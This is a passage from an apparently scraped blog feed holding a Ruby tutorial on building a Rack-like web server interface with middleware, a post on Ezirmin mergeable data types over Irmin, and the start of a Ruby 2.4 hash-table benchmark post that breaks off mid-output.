\"HTTP_DNT\"=>\"1\", \"HTTP_ACCEPT_ENCODING\"=>\"gzip, deflate, sdch, br\", \"HTTP_ACCEPT_LANGUAGE\"=>\"en-US,en;q=0.8,ml;q=0.6\", \"SERVER_NAME\"=>\"localhost\", \"SERVER_PORT\"=>\"9292\", \"PATH_INFO\"=>\"\u002Fhello\u002Fworld\", \"REMOTE_ADDR\"=>\"127.0.0.1\", \"puma.socket\"=>#, \"rack.hijack?\"=>true, \"rack.hijack\"=>#, \"rack.input\"=>#>, \"rack.url_scheme\"=>\"http\", \"rack.after_reply\"=>[], \"puma.config\"=>#\"development\", :pid=>nil, :Port=>9292, :Host=>\"localhost\", :AccessLog=>[], :config=>\"\u002Fhome\u002Ftachyons\u002Fcode\u002Frack\u002Fconfig.ru\"}, {:log_requests=>false, :environment=>\"development\", :binds=>[\"tcp:\u002F\u002Flocalhost:9292\"], :app=>#, @content_length=nil>>, @logger=#>>>>}, {:environment=>\"development\"}, {}], @defaults={:min_threads=>0, :max_threads=>16, :log_requests=>false, :debug=>false, :binds=>[\"tcp:\u002F\u002F0.0.0.0:9292\"], :workers=>0, :daemon=>false, :mode=>:http, :worker_timeout=>60, :worker_boot_timeout=>60, :worker_shutdown_timeout=>30, :remote_address=>:socket, :tag=>\"rack\", :environment=>\"development\", :rackup=>\"config.ru\", :logger=>#>, 
:persistent_timeout=>20}>, @plugins=#>, \"rack.tempfiles\"=>[]}\n\n\n\nNow change the URL and watch the output change.\nTo make this clearer, let's build a simple app that says hello:\n\nclass CoolApp\n  def self.call(env)\n    ['200', {'Content-Type' => 'text\u002Fhtml'}, [ \"Hi \" + env['REQUEST_PATH'].split('\u002F').join(\" \")]]\n  end\nend\n\nrun CoolApp\n\n\nRun rackup again, and go to localhost:9292\u002Faboobacker\u002Fmk\nThe app will respond with “Hi aboobacker mk”.\nYou can implement your own logic using the env variable provided by Rack.\nRack also provides the Rack Request abstraction, which offers a convenient interface to a Rack environment.\nBut that is not the end: Rack also provides a feature called middleware, which lets you compose multiple Rack apps as a pipeline, i.e. the output of one Rack app is fed as input to the next. Let's check that with an example:\n\nclass ReverseOutput\n  def initialize(app)\n    @app = app\n  end\n\n  def call(env)\n    status, headers, body = @app.call(env)\n    body = body.map { |msg| msg.reverse }\n    [status, headers, body]\n  end\nend\n\nclass CoolApp\n  def self.call(env)\n    ['200', {'Content-Type' => 'text\u002Fhtml'}, [ \"Hi \" + env['REQUEST_PATH'].split('\u002F').join(\" \")]]\n  end\nend\n\nuse ReverseOutput\nrun CoolApp\n\n\nHere we made a simple middleware, ReverseOutput, which reverses the response body. You can add any number of middlewares like this, and you can also use the predefined middlewares provided by Rack or open-source general-purpose ones. List of middlewares\nBuilding from scratch\nNow let's look at how Rack works by building a Rack-like library from scratch; let's name it Srack. One obvious question first: why is the rackup file called config.ru and not config.rb? And where do methods like use and run come from?\nLet's look at our first code sample in a different way:\n\n# app.rb\n  Rack::Builder.app do\n    run Proc.new { |env| ['200', {'Content-Type' => 'text\u002Fhtml'}, ['Hello World\\'d']] }\n  end\n\n\nHere we can see that config.ru is a block that is passed to the Rack::Builder.app method.\n\nbundle gem srack\n\n\nNow remove all TODOs from srack.gemspec so that we can run the test cases. If we run the tests now, they will show one failure:\n\nFailed examples:\n\nrspec .\u002Fspec\u002Fsrack_spec.rb:8 # Srack does something useful\n\n\n\nAnd it is true, we haven't done anything useful yet.\nThe first thing we have to do is build an executable equivalent to rackup; let's call it srackup.\n\ntouch exe\u002Fsrackup\n\n\n\n#!\u002Fusr\u002Fbin\u002Fenv ruby\n\nrequire \"srack\"\nSrack::Server.start\n\n\nI copied the file above from the rack repo to make sure we follow the same conventions. Since we haven't implemented Srack::Server, this won't work yet. So let's make that first.\nSince we need an instance of Srack::Server, we can make it a class and define start as a class method:\n\nmodule Srack\n  class Server\n    def self.start\n    end\n  end\nend\n\n\nNow we have the Srack::Server.start method. But it is doing nothing. 
Since we want a Server object, we can delegate the start class method to an instance method.\n\nmodule Srack\n  class Server\n    def self.start\n      new.start\n    end\n\n    def start\n    end\n  end\nend\n\n\nNow let's set some default options for our app:\n\nmodule Srack\n  class Server\n    def initialize\n      @options = default_options\n    end\n\n    def self.start\n      new.start\n    end\n\n    def start\n    end\n\n    private\n\n    def default_options\n      {\n        environment: \"development\",\n        Port: \"9393\",\n        Host: \"localhost\"\n      }\n    end\n  end\nend\n\n\nNow we have to build the app from config.ru, or from the file passed as an argument; we can store the file name in the @options hash under the key config:\n\nmodule Srack\n  class Server\n    def initialize\n      @options = default_options\n      @options[:config] = ARGV[0] if ARGV[0]\n      @app = build_app\n    end\n\n    def self.start\n      new.start\n    end\n\n    def start\n    end\n\n    private\n\n    def default_options\n      {\n        environment: \"development\",\n        Port: \"9393\",\n        Host: \"localhost\",\n        config: 'config.ru'\n      }\n    end\n\n    def build_app\n      Builder.parse_file(@options[:config])\n    end\n  end\nend\n\n\nHere we are using Srack::Builder to parse the config file and load the app from it. Let's implement that logic in the Builder factory:\n\nmodule Srack\n  class Builder\n    def self.parse_file(config)\n      config_file = ::File.read(config)\n      new_from_string(config_file)\n    end\n\n    def self.new_from_string(builder_script)\n      eval \"Srack::Builder.new {\\n\" + builder_script + \"\\n}.to_app\"\n    end\n  end\nend\n\n\n\nThe first method is self-explanatory: it just reads the file and passes the file body to new_from_string. The new_from_string method takes the file contents, turns them into a block and hands it to Srack::Builder.new, so that we can execute the contents of config.ru in the context of the builder. (Note that it must reference Srack::Builder, not Rack::Builder, since this is our own library.)\nRemember our first rack app?\n\n# config.ru\nrun Proc.new { |env| ['200', {'Content-Type' => 'text\u002Fhtml'}, ['Hello World\\'d']] }\n\n\nIn order to execute this:\nthe Builder class should accept a block in its initialize method\nand execute it within the context of the Builder object;\nthe Builder class should also have the methods run and to_app as setter and getter.\nLet's see it in code:\n\nmodule Srack\n  class Builder\n    def initialize(&block)\n      instance_eval(&block) if block_given?\n    end\n\n    def run(app)\n      @app = app\n    end\n\n    def to_app\n      @app\n    end\n\n    def self.parse_file(config)\n      config_file = ::File.read(config)\n      new_from_string(config_file)\n    end\n\n    def self.new_from_string(builder_script)\n      eval \"Srack::Builder.new {\\n\" + builder_script + \"\\n}.to_app\"\n    end\n  end\nend\n\n\nNow we have a Builder class, but the start method in Srack::Server is still empty. To fill it in, we have to connect to a real server. 
Remember when we mentioned that Rack is an interface to web servers?\n\nmodule Srack\n  class Server\n    ...\n    def start\n      server.run @app, @options\n    end\n\n    private\n\n    def server\n      @server ||= Srack::Handler.default\n    end\n    ...\n  end\nend\n\n\nSrack will have a handler for each type of server, with a single common API: every handler should respond to a run method taking two arguments, the app and the options.\n\n# lib\u002Fsrack\u002Fhandler.rb\nmodule Srack\n  module Handler\n    autoload :Thin, 'srack\u002Fhandler\u002Fthin'\n    def self.default\n      Handler::Thin\n    end\n  end\nend\n\n\n\n# lib\u002Fsrack\u002Fhandler\u002Fthin.rb\nrequire 'thin'\nmodule Srack\n  module Handler\n    class Thin\n      def self.run(app, options = {})\n        host = options[:Host]\n        port = options[:Port]\n        args = [host, port, app, options]\n        server = ::Thin::Server.new(*args)\n        server.start\n      end\n    end\n  end\nend\n\n\nHere we made a Handler module that can accommodate multiple handlers; in this example we use Thin as the default server. To use Thin inside our gem, we have to declare it in srack.gemspec:\n\nspec.add_dependency \"thin\"\n\n\nNow you can build the gem to test it:\n\ngem build srack.gemspec\ngem install srack-0.1.0.gem\n\n\nNow Srack is capable of running our first Rack app: just go to the directory containing config.ru and run srackup.\nImplementing middleware\nAs discussed earlier, one of the most widely used features of Rack is middleware. Let's see how it works: a middleware takes the output (the triplet) of a Rack app, modifies it, and passes it on to the next middleware or back to the server.\nWe can make some tweaks to Srack::Builder to accommodate this:\n\n...\nclass Builder\n  ...\n  def initialize(&block)\n    @use = []\n    instance_eval(&block) if block_given?\n  end\n\n  def run(app)\n    @run = app\n  end\n\n  def use(middleware, *args, &block)\n    @use \u003C\u003C proc {|app| middleware.new(app, *args, &block)}\n  end\n\n  def to_app\n    app = @run\n    app = @use.reverse.inject(app) { |a,e| e[a] }\n    app\n  end\n  ...\nend\n...\n\n\nHere we defined an extra method, use, which accepts a middleware as input. We also have a new instance variable @use, an array of procs, each of which takes an app and returns a new middleware object wrapping it. Finally, we changed to_app to fold the app through @use in reverse, so that the first middleware registered ends up outermost and runs first.\nNow our app can also handle middlewares.\nIf something is missing or you are getting errors, you can cross-check with my repo here\nReferences\nhttps:\u002F\u002Fgithub.com\u002Frack\nhttp:\u002F\u002Fwww.kavinder.com\u002Fblog\u002F2014-10-10-rebuild-a-gem-rack\u002F
In this\npost, I will primarily discuss the Ezirmin library, but also discuss some of the\nfiner technical details of mergeable data types implemented over Irmin.\nContents\nContents\nIrmin and Ezirmin\nQuick tour of Ezirmin    \nMerge semantics\nWorking with history\nReacting to changes\nInteraction with remotes\nMergeable persistent data types    \nIrmin Architecture\nUser-defined merges\nMergeable Counters        \nTheory of merges\nRecursive merges\nMergeable logs        \nEfficient mergeable logs\nMergeable ropes\nNext steps\nIrmin and Ezirmin\nIrmin is a library for manipulating persistent mergeable data structures\n(including CRDTs) that follows the same principles of Git. In particular, it has\nbuilt-in support for snapshots, branches and reverts, and can compile to\nmultiple backends. Being written in pure OCaml, apps written using Irmin, as\nwell as running natively, can run in the browsers or be compiled to Unikernels.\nA good introduction to the capabilities of Irmin can be found in the Irmin\nREADME file.\nOne of the downsides to being extremely configurable is that the Irmin library\nis not beginner friendly. In particular, the library tends to be rather functor\nheavy, and even simple\nuses require\nmultiple functor instantiations1. The primary goal of Ezirmin is to\nprovide a defuntorized interface to Irmin, specialized to useful defaults.\nHowever, as I’ve continued to build Ezirmin, it has come to include a collection\nof useful mergeable data types including counters, queues, ropes, logs, etc. I\nwill spend some time describing some of the interesting aspects of these data\nstructures.\nQuick tour of Ezirmin\nYou can install the latest version of Ezirmin by\n\n$ git clone https:\u002F\u002Fgithub.com\u002Fkayceesrk\u002Fezirmin\n$ cd ezirmin\n$ opam pin add ezirmin .\n\n\nStable versions are also available through OPAM:\n\n$ opam install ezirmin\n\n\nLet’s fire up utop and get started:\n\n$ utop\nutop # #require \"ezirmin\";;\nutop # open Lwt.Infix;;\n\n\nWe’ll create a mergeable queue of strings using the Git file system backend\nrooted at \u002Ftmp\u002Fezirminq:\n\nutop # module M = Ezirmin.FS_queue(Tc.String);; (* Mergeable queue of strings *)\nutop # open M;;\nutop # let m = Lwt_main.run (init ~root:\"\u002Ftmp\u002Fezirminq\" ~bare:true () >>= master);;\nval m : branch = \u003Cabstr>\n\n\nm is the master branch of the repository. Ezirmin exposes a key value store,\nwhere keys are hierarchical paths and values are whatever data types is stored in\nthe repo. In this case, the data type is a queue. Let’s push some elements into\nthe queue:\n\nutop # push m [\"home\"; \"todo\"] \"buy milk\";;\n- : unit = ()\nutop # push m [\"work\"; \"todo\"] \"publish ezirmin\";;\n- : unit = ()\nutop # to_list m [\"home\"; \"todo\"];;\n- : string list = [\"buy milk\"]\n\n\nThe updates to the queue is saved in the Git repository at \u002Ftmp\u002Fezirminq. In\nanother terminal,\n\n$ utop\nutop # #require \"ezirmin\";;\nutop # module M = Ezirmin.FS_queue(Tc.String);; (* Mergeable queue of strings *)\nutop # open M;;\nutop # open Lwt.Infix;;\nutop # let m = Lwt_main.run (init ~root:\"\u002Ftmp\u002Fezirminq\" ~bare:true () >>= master);;\nval m : branch = \u003Cabstr>\nutop # pop m [\"home\"; \"todo\"];;\n- : string option = Some \"buy milk\"\n\n\nFor concurrency control, use branches. 
In the first terminal,\n\nutop # let wip = Lwt_main.run @@ clone_force m \"wip\";;\nutop # push wip [\"home\"; \"todo\"] \"walk dog\";;\n- : unit = ()\nutop # push wip [\"home\"; \"todo\"] \"take out trash\";;\n- : unit = ()\n\n\nThe changes are not visible until the branches are merged.\n\nutop # to_list m [\"home\"; \"todo\"];;\n- : string list = []\nutop # merge wip ~into:m;;\n- : unit = ()\nutop # to_list m [\"home\"; \"todo\"];;\n- : string list = [\"walk dog\"; \"take out trash\"]\n\n\nMerge semantics\nWhat should be the semantics of popping the queue at home\u002Ftodo concurrently\nat the master branch and wip branch? It is reasonable to ascribe exactly once\nsemantics to pop such that popping the same element on both branches and\nsubsequently merging the queues would lead to a merge conflict. However, a more\nuseful semantics is where we relax this invariant and allow elements to be\npopped more than once on different branches. In particular, the merge operation\non the queue ensures that:\nAn element popped in one of the branches is not present after the merge.\nMerges respect the program order in each of the branches.\nMerges converge.\nHence, our merge queues are CRDTs.\nWorking with history\nIrmin is fully compatible with Git. Hence, we can explore the history of the\noperations using the git command line. In another terminal:\n\n$ cd \u002Ftmp\u002Fezirminq\n$ git lg\n* e75da48 - (4 minutes ago) push - Irmin xxxx.cam.ac.uk.[73126] (HEAD -> master, wip)\n* 40ed32d - (4 minutes ago) push - Irmin xxxx.cam.ac.uk.[73126]\n* 6a56fb0 - (5 minutes ago) pop - Irmin xxxx.cam.ac.uk.[73221]\n* 6a2cc9a - (6 minutes ago) push - Irmin xxxx.cam.ac.uk.[73126]\n* 55f7fc8 - (6 minutes ago) push - Irmin xxxx.cam.ac.uk.[73126]\n\n\nThe Git log shows that there have been 4 pushes and 1 pop in this repository.\nIn addition to the data structures being mergeable, they are also persistent.\nIn particular, every object stored in Irmin has complete provenance. You can\nalso manipulate history using the Git command line.\n\n$ git reset HEAD~2 --hard\n$ git lg\n* e75da48 - (8 minutes ago) push - Irmin xxxx.cam.ac.uk.[73126] (wip)\n* 40ed32d - (9 minutes ago) push - Irmin xxxx.cam.ac.uk.[73126]\n* 6a56fb0 - (9 minutes ago) pop - Irmin xxxx.cam.ac.uk.[73221] (HEAD -> master)\n* 6a2cc9a - (10 minutes ago) push - Irmin xxxx.cam.ac.uk.[73126]\n* 55f7fc8 - (10 minutes ago) push - Irmin xxxx.cam.ac.uk.[73126]\n\n\nBack in the first terminal:\n\nutop # to_list m [\"home\"; \"todo\"];;\n- : string list = []\n\n\nSince we rolled back the master to before the pushes were merged, we see an\nempty list. Ezirmin also provides APIs for working with history\nprogrammatically.\n\nutop # let run = Lwt_main.run;;\nutop # let repo = run @@ init ();;\nutop # let path = [\"Books\"; \"Ovine Supply Logistics\"];;\nutop # let push_msg = push m ~path;;\n\nutop # begin\n  push_msg \"Baa\" >>= fun () ->\n  push_msg \"Baa\" >>= fun () ->\n  push_msg \"Black\" >>= fun () ->\n  push_msg \"Camel\"\nend;;\n\nutop # to_list m path;;\n- : string list = [\"Baa\"; \"Baa\"; \"Black\"; \"Camel\"]\n\n\nClearly this is wrong. 
Let’s fix this by reverting to earlier version:\n\nutop # let m_1::_ = run @@ predecessors repo m;; (** HEAD~1 version *)\nutop # to_list m_1 path;;\n- : string list = [\"Baa\"; \"Baa\"; \"Black\"]\nutop # update_branch m ~set:m_1;;\nutop # to_list m path;;\n- : string list = [\"Baa\"; \"Baa\"; \"Black\"]\n\n\nNow that we’ve undone the error, we can do the right thing.\n\nutop # push_msg \"Sheep\";;\nutop # run @@ to_list m path;;\n- : string list = [\"Baa\"; \"Baa\"; \"Black\"; \"Sheep\"]\n\n\nReacting to changes\nEzirmin supports watching a particular key for updates and invoking a callback\nfunction when there is one.\n\nutop # let cb _ = Lwt.return (print_endline \"callback: update to home\u002Ftodo\");;\nutop # watch m [\"home\"; \"todo\"] cb\n\n\nThe code above installs a listener cb on the queue at home\u002Ftodo, which is\nrun every time the queue is updated. This includes local push and pop\noperations as well as updates due to merges.\n\nutop # push m [\"home\"; \"todo\"] \"hang pictures\";;\ncallback: update to home\u002Ftodo\n- : unit = ()\n\n\nInteraction with remotes\nUnlike distributed data stores, where the updates are disseminated\ntransparently between the replicas, Ezirmin provides you the necessary building\nblocks for building your own dissemination protocol. As with Git, Ezirmin\nexposes the functionality to push2 and pull changes from remotes.\n\n#show_module Sync;;\nmodule Sync : sig\n  type remote\n  val remote_uri : string -> remote\n  val pull : remote -> branch -> [ `Merge | `Update ] -> [ `Conflict of string | `Error | `No_head | `Ok ] Lwt.t\n  val push : remote -> branch -> [ `Error | `Ok ] Lwt.t\nend\n\n\nThis design provides the flexibility to describe your own network layout, with\nanti-entropy mechanisms built-in to the synchronization protocol. For example,\none might deploy the replicas in a hub-and-spoke model where each replica\naccepts client writes locally and periodically publishes changes to the master\nand also fetches any latest updates. The data structures provided by Ezirmin\nare always mergeable and converge. Hence, the updates are never rejected. It is\nimportant to note that even though we have a centralized master, this\ndeployment is still highly available. Even if the master is unavailable, the\nother nodes can still accept client requests. The replicas may also be\nconnected in a peer-to-peer fashion without a centralized master for a more\nresilient deployment.\nMergeable persistent data types\nEzirmin is equipped with a growing\ncollection of mergeable\ndata types. The mergeable datatypes occupy a unique position in the space of\nCRDTs. Given that we have the history, the design of mergeable datatypes is much\nsimpler. Additionally, this also leads to richer\nstructures typically not found in CRDTs.\nIt is worth studying them in detail.\nIrmin Architecture\nIrmin provides a high-level key-value interface built over two lower level\nheaps: a block store and a tag store. A block store is an append-only\ncontent-addressable store that stores serialized values of application contents,\nprefix-tree nodes, history meta-data, etc. Instead of using physical memory\naddress of blocks, the blocks are identified by the hash of their contents. As a\nresult block store enjoys very nice properties. Being content-addressed, we get\nsharing for free: two blocks with the same content will have the have the same\nhash. This not only applies for individual blocks, but also for\nlinked-structures. 
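A toy sketch of what content-addressing buys us (invented helpers; Digest is OCaml's MD5 module standing in for a real hash, and Irmin's actual block store is richer):\n\n(* Address -> serialised block. An address is the hash of the block's contents. *)\nlet store : (string, string) Hashtbl.t = Hashtbl.create 16\n\nlet put contents =\n  let addr = Digest.to_hex (Digest.string contents) in\n  Hashtbl.replace store addr contents;\n  addr\n\n(* A list cell serialises its element together with the address of its tail,\n   so the address of the head fingerprints the entire list. *)\nlet nil = put \"nil\"\nlet cons x tail_addr = put (x ^ \":\" ^ tail_addr)\n\nlet c2 = cons \"c\" nil\nlet c1 = cons \"b\" c2\nlet c0 = cons \"a\" c1  (* determined by \"a\" and c1, hence by the whole list *)\nlet () = print_endline c0\n\nStoring the same list twice yields the same addresses, so equal structures share blocks for free.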
For example,\n  \nThe linked list above is uniquely identified by hash h0 since h0 was\ncomputed from the content a and the hash of the tail of the list h1. No\nother list has hash h0. Changing c to C in this list would result in a\ndifferent hash for the head of the list3. Moreover, since the block\nstore is append-only, all previous versions of a application-level data\nstructure is also available, and thus providing persistence. This also makes for\na nice concurrency story for multiple processes\u002Fthreads operating on the block\nstore. The absence of mutations on block store mean that no additional\nconcurrency control mechanisms are necessary.\nThe only mutable part of the Irmin architecture is the tag store, that maps\nglobal names to blocks in the block store. The notion of branches are built on\ntop of the tag store. Cloning a branch creates a new tag that points to the same\nblock as the cloned branch.\nUser-defined merges\nThe real power of Irmin is due to the user-defined merges. Irmin expects the\ndeveloper to provide a 3-way merge function with the following signature:\n\ntype t\n(** User-defined contents. *)\n\nval merge : old:t -> t -> t -> [`Ok of t | `Conflict of string]\n(** 3-way merge. *)\n\n\nGiven the common ancestor old and the two versions, merge function can either\nreturn a successful merge or mark a conflict. It is up to the developer to ensure\nthat merges are commutative (merge old a b = merge old b a) and that the merge\ncaptures the intent of the two branches. If the merge function never conflicts,\nwe have CRDTs.\nMergeable Counters\nThe simplest mergeable data type is a counter with an increment and decrement\noperations. Given that we have a 3-way merge function, the merge is intuitive:\n\n\nGiven the two new values for the counter t1 and t2, and their lowest common\nancestor value old, the new value of the counter is the sum of the old value\nand the two deltas: old + (t1 - old) + (t2 - old) = t1 + t2 - old.\nTheory of merges\nWhile this definition is intuitive, the proof of why this strategy (i.e.,\ncomputing deltas and applying to the common ancestor) is correct is quite\nsubtle. It happens to be the case that the patches (deltas) in this case,\nintegers under addition, form an abelian\ngroup. Judah Jacobson formalizes\npatches for Darcs as inverse\nsemigroups and proves\nconvergence. Every abelian group is also an inverse semigroup. Hence, the above\nstrategy is correct. Merges can also be equivalently viewed as a pushout in\ncategory theory, leading to the same\nresult. I will have to save the discussion of the category theoretic reasoning\nof Irmin merges for another time. But Liam O’Connor has written a concise\npost on the theory of patches\nwhich is worth a read.\nRecursive merges\nSince Ezirmin allows arbitrary branching and merging, the lowest common ancestor\nneed not be unique. One way to end up with multiple lowest common ancestors is\ncriss-cross merges. For example, consider the history graph below:\n  \nThe counter at some key in the master was initially 0. The branch wip was\ncloned at this point. The counter is incremented by 1 at master and 2 at\nwip. At this point, both branches are merged into the other branch. The common\nancestor here is the initial state of counter 0. This results in counter value\nof 3 in both branches. 
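The merge function for counters (its code block was stripped from this snippet) is a one-liner against the signature above; a sketch:\n\n(* 3-way merge for an integer counter: apply both branches' deltas to the\n   common ancestor: old + (t1 - old) + (t2 - old) = t1 + t2 - old. *)\nlet merge ~old t1 t2 = `Ok (t1 + t2 - old)\n\nWith old = 0, t1 = 1 and t2 = 2 this yields 3, matching the merge just described; and since it never returns `Conflict, these counters are CRDTs.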
Suppose there are further increments, 2 at master\nand 4 at wip, resulting in counter values 5 and 7 respectively in\nmaster and wip.\nIf the wip branch is now merged in master, there are two lowest common\nancestors: the commit with value 1 at master and 2 in wip. Since the 3-way\nmerge algorithm only work for a single common ancestor, the we adopt a recursive\nmerge strategy, where the lowest common ancestors are first merged resulting in\na internal commit with value 3 (represented by a dotted circle). This commit\nis now used as the common ancestor for merging, which results in 9 as the new\nstate of the counter. This matches the increments done in both branches. The\nrecursive merge strategy is also the default merge strategy for Git.\nMergeable logs\nAnother useful data type is mergeable\nlogs, where each log message\nis a string. The merge operation accumulates the logs in reverse chronological\norder. To this end, each log entry is a pair of timestamp and message, and the\nlog itself is a list of entries. They are constructed using\nmirage-tc:\n\n\nThe merge function extracts the newer entries from either branches, sorts them\nand appends to the front of the old list.\n\n\nWhile this implementation is simple, it does not scale well. In particular, each\ncommit stores the entire log as a single serialized blob. This does not take\nadvantage of the fact that every commit can share the tail of the log with its\npredecessor. Moreover, every append to the log needs to deserialize the entire\nlog, append the new entry and serialize the log again. Hence, append is an\nO(n) operation, where n is the size of the log. Merges are also worst case\nO(n). This is undesirable.\nEfficient mergeable logs\nWe can implement a efficient logs\nby taking advantage of the fact that every commit shares the tail of the log\nwith its predecessor.\n\ntype log_entry = {\n  time    : Time.t;\n  message : V.t;        (** V.t is type of message. *)\n  prev    : K.t option  (** K.t is the type of address in the block store. *)\n}\n\n\nMerges simply add a new node which points to the logs of merged branches,\nresulting in a DAG that captures the causal history. The following sequence of\noperations:\n\nutop # #require \"ezirmin\";;\nutop # open Lwt.Infix;;\nutop # module M = Ezirmin.Memory_log(Tc.String);;\nutop # open M;;\nutop # let m = Lwt_main.run (init () >>= master);;\nutop # Lwt_main.run (\n  append m [] \"m0\" >>= fun _ ->\n  append m [] \"m1\" >>= fun _ ->\n  clone_force m \"wip\" >>= fun w ->\n  append w [] \"w0\" >>= fun _ ->\n  append m [] \"m2\" >>= fun _ ->\n  merge w ~into:m >>= fun _ ->\n  append w [] \"w1\" >>= fun _ ->\n  append w [] \"w2\" >>= fun _ ->\n  append m [] \"m3\" >>= fun _ ->\n  append m [] \"m4\"\n);;\n\n\nresults in the heap below.\n  \nRead traverses the log in reverse chronological order.\n\nutop # read_all m [];;\n- : string list = [\"m4\"; \"m3\"; \"m2\"; \"w0\"; \"m1\"; \"m0\"]\n\n\nThis implementation has O(1) appends and O(1) merges, resulting in much\nbetter performance. The graph below compares the blob log implementation and\nthis linked implementation with file system backend by performing repeated\nappends to the log and measuring the latency for append.\n  \nEach point represents the average latency for the previous 100 appends. The\nresults show that the append latency for linked implementation remains\nrelatively constant while the blob implementation slows down considerably with\nincreasing number of appends. 
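To recap why appends stay cheap in the linked representation: an append serialises just one new log_entry whose prev field points at the previous head, then repoints the branch head. A self-contained toy version (the hashtable and ref stand in for Irmin's block and tag stores):\n\ntype log_entry = { time : float; message : string; prev : int option }\n\nlet blocks : (int, log_entry) Hashtbl.t = Hashtbl.create 16  (* block store *)\nlet head : int option ref = ref None                         (* tag store *)\nlet next_addr = ref 0\n\n(* O(1): one new block plus a head update, independent of log length. *)\nlet append message =\n  let addr = !next_addr in\n  incr next_addr;\n  Hashtbl.replace blocks addr { time = Sys.time (); message; prev = !head };\n  head := Some addr\n\n(* Reads walk the prev pointers, newest first (reverse chronological order). *)\nlet read_all () =\n  let rec go = function\n    | None -> []\n    | Some addr -> let e = Hashtbl.find blocks addr in e.message :: go e.prev\n  in\n  go !head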
Additionally, the linked implementation also\nsupports efficient paginated\nreads.\nMergeable ropes\nA rope data structure is used for efficiently storing and manipulating very long\nstrings. Ezirmin provides mergeable\nropes for arbitrary\ncontents, as well as a version\nspecialized for strings.\nRopes automatically rebalance to maintain the invariant that the height of the\ntree is proportional to the logarithm of the length of the contents. The crux of the merge\nstrategy is that given a common ancestor and the two trees to be merged,\nthe merge algorithm works out the smallest subtrees where the modifications\noccurred. If the modifications are on distinct subtrees, then the merge is\ntrivial.\n  \nIf the modifications are on the same subtree, then the algorithm delegates the\nmerge to the contents. This problem has been well studied under the name of\noperational\ntransformation (OT).\nOT can be categorically explained in terms of pushouts.\nMergeable strings with insert, delete and replace operations are isomorphic to\ncounters with increment and decrement. We apply a similar strategy to merge\nstrings.\n\n\nFirst we compute the diff between the common ancestor and the new tree using the\nWagner-Fischer\nalgorithm. Then\nwe transform one patch with respect to the other using the standard OT definition,\nsuch that we can first apply one of the original patches to the common ancestor\nand then apply the transformed patch of the other branch to get the resulting tree.\nFor example,\n\nutop # #require \"ezirmin\";;\nutop # open Lwt.Infix;;\nutop # open Ezirmin.Memory_rope_string;;\nutop # let m = Lwt_main.run (init () >>= master);;\nutop # let t = Lwt_main.run (\n  make \"abc\" >>= fun t ->\n  write m [] t >>= fun _ ->\n  Lwt.return t\n);;\nutop # let w = Lwt_main.run (clone_force m \"w\");;\nutop # let _ = Lwt_main.run (\n  set t 1 'x' >>= fun t' (* \"axc\" *) ->\n  write m [] t' >>= fun _ ->\n\n  insert t 1 \"y\" >>= fun t' (* \"aybc\" *)->\n  write w [] t' >>= fun _ ->\n\n  merge w ~into:m >>= fun _ (* \"ayxc\" *) ->\n  merge m ~into:w\n);;\nutop # Lwt_main.run (\n  read m [] >>= function\n  | None -> failwith \"impossible\"\n  | Some r -> flush r >|= fun s ->\n  Printf.printf \"m is \\\"%s\\\"\\n\" s\n);;\n- : unit = ()\nm is \"ayxc\"\nutop # Lwt_main.run (\n  read w [] >>= function\n  | None -> failwith \"impossible\"\n  | Some r -> flush r >|= fun s ->\n  Printf.printf \"w is \\\"%s\\\"\\n\" s\n)\n- : unit = ()\nw is \"ayxc\"\n\n\nThe combination of mergeable ropes with OT gets the best of both worlds.\nCompared to a purely OT based implementation, diffs are only computed if updates\nconflict at the leaves. The representation using ropes is also efficient in\nterms of storage, since multiple versions of the tree share blocks. A purely\nrope based implementation can either store individual characters\n(atoms) at the leaves and resolve conflicts using some deterministic\nmechanism such as timestamps, or surface the\nconflict at the leaves to the user to get it resolved. A simple strategy might\nbe to present both of the conflicting strings, and ask the user to resolve it.\nHence, mergeable ropes + OT is strictly better than either approach alone.\nNext steps\nEzirmin is open to comments and contributions. Next steps would be:\nImplement more mergeable data types\nImplement generic mergeable datatypes using depyt.\nExplore the data types which admit conflicts. For example, a bank account with\nnon-negative balance does not form a CRDT with a withdraw operation. However,\noperations such as deposit and accrue_interest can be coordination-free (a\nsketch follows below). 
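Concretely, such an account’s merge might be sketched as follows, assuming plain integer balances and a counter-style delta merge (purely illustrative, not part of Ezirmin):\n\ntype t = int (* account balance; must remain non-negative *)\n\nlet merge ~old t1 t2 : [`Ok of t | `Conflict of string] =\n  (* Apply both branches' deltas to the common ancestor. *)\n  let merged = t1 + t2 - old in\n  if merged >= 0 then `Ok merged\n  else `Conflict \"concurrent withdrawals would overdraw the account\"\n\n\nDeposits and interest only ever increase the balance, so they can never trigger the conflict case; withdrawals can, which is exactly why they need coordination.\n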
Footnotes\nThings are indeed improving with a cleaner API in the 1.0 release. ↩\nPush is currently broken. But given that Irmin is compatible with git, one can use git-push to publish changes. ↩\nThe same principle underlies the irrefutability of blockchains. No block can be changed without reflecting the change in every subsequent block. ↩",[],{"slug":2661,"title":2662,"link":2663,"pubDate":2664,"contentSnippet":2665,"tags":2666,"maintainerName":1639,"maintainerUsername":1640,"maintainerPhoto":77,"feedUrl":1641},"behind-scenes-hash-table-performance-ruby-2-4-html","Behind the scenes of hash table performance in ruby 2.4","https:\u002F\u002Faboobacker.in\u002F2017\u002F01\u002F30\u002Fbehind-scenes-hash-table-performance-ruby-2-4.html","2017-01-30T04:00:13.000Z","Ruby 2.4 got released this Christmas with a lot of exciting features. One of the most underrated features in Ruby 2.4 is the hash table improvements. Before going into the implementation details, let’s first check the benchmark to see how this change is going to affect your Ruby application.\nGetting keys and values of a hash\n\nh = {}\n\n10000.times do |i|\n  h[i] = nil\nend\n\n# Get all hash values\nBenchmark.measure { 50000.times { h.values } }\n\n# Get all hash keys\nBenchmark.measure { 50000.times { h.keys } }\n\n\nRuby 2.3\n\n=> #\u003CBenchmark::Tms:0x00000002a0f990 @label=\"\", @real=2.8023432340005456, @cstime=0.0, @cutime=0.0, @stime=0.13000000000000012, @utime=2.6799999999999997, @total=2.8099999999999996>\n#\u003CBenchmark::Tms:0x00000002963398 @label=\"\", @real=2.767410662000657, @cstime=0.0, @cutime=0.0, @stime=0.029999999999999805, @utime=2.729999999999997, @total=2.7599999999999967>\n\n\nRuby 2.4\n\n#\u003CBenchmark::Tms:0x0000000226d700 @label=\"\", @real=0.8854832770002758, @cstime=0.0, @cutime=0.0, @stime=0.08999999999999997, @utime=0.7999999999999998, @total=0.8899999999999998>\n#\u003CBenchmark::Tms:0x000000022b1018 @label=\"\", @real=0.8476084579997405, @cstime=0.0, @cutime=0.0, @stime=0.06999999999999995, @utime=0.7799999999999994, 